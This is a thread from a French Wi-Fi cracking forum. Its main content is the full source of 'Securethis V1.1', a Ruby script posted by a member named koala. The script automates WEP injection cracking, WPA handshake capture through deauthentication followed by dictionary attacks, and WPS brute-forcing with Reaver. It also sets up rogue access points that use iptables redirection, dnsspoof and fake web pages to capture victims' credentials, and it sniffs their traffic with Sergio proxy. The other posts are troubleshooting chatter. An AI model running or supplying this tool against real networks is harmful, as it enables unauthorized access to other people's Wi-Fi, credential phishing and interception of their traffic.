Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#51 07-12-2013 15:35:02

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Un script en ruby restera en rb, en python en py et en bash en sh on mélange pas les chiens et les chats wink


Si tu a des erreurs je te conseil de passer sur BT5 ou Kali car comprends bien que je vais pas modifier le script pour juste pour une personne tournant sur BT3 cool

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#52 07-12-2013 19:58:00

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

je suis en BT5 R3 pas BT3

Hors Ligne

#53 07-12-2013 20:11:01

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Securethis V 1.0 script pour WEP/WPA

FFOO31 a écrit :

je suis en BT5 R3 pas BT3

Je veux surtout pas me mêler de ce qu'y me regarde pas mais t'attends quoi pour passer sous Kali ??


Parce que BT5R3 c'est envisageable que pour certains scripts encore (et encore, la plupart ont été modifié pour Kali)...


C'est quoi qui te gêne dans cette histoire wink



Ah, au fait en passant, bravo Koala et Merci de tes MAJ sur ce projet wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#54 07-12-2013 20:15:37

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

merci furyo, je vais passer en kali ces jours ci,

Hors Ligne

#55 19-04-2014 18:04:05

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : Securethis V 1.0 script pour WEP/WPA

Salut, je me suis remis un peu dans le tuto, j'avais pas eu le temps de continuer mes essais.

Je n'arrive pas a faire la rogue AP.

Quand j'utilise le script que koala à refait pour kali, le script ne se lance pas a cause d'erreur de syntaxe.

Quand j'utilise le script précédent, il se lance et quand je lance la rogue AP internet sur mon wifi, il y à une erreur de channel -1 tel que le décris koala au dessus du script qu'il avait recompilé pour kali.

Je continue de chercher pour le faire fonctionner mais comme en plus la video de koala a été supprimée de dayli c'est encore moins simple.

Si je retrouve comment on fait une capture d'écran je posterais celle-ci qui vous parleront mieux que moi et surtout plus en détail.

Ps: je suis sous kali et j'ai fait toutes les mises à jour.

Dernière modification par Fab955 (19-04-2014 18:11:54)

Hors Ligne

#56 19-04-2014 18:31:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

OMG tu as raison ! j'avais oublier de fermer un guillemet créant des erreurs de syntaxe a la suite hmm je regrette que l'on me l'ai pas signaler plutot neutral

Voici le bon cette fois qui fonctionne sous Kali avec tout les guillemets fermés:  (vérifie que tu es highline d'installer)

#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: [url]http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm[/url]  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to [url]https://code.google.com/p/sergio-proxy/[/url] special thanks to Antares145 and his tuto, can be found here: [url=http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/\)]http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/[/url]")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            " 
  
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }    
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Dernière modification par koala (19-04-2014 18:33:00)

Hors Ligne

#57 19-04-2014 18:34:41

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : Securethis V 1.0 script pour WEP/WPA

Oui highline est bien installer. Je finit l'upgrade de xubuntu et je redemarre sous kali tester ça.

Merci de ta rapidité!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]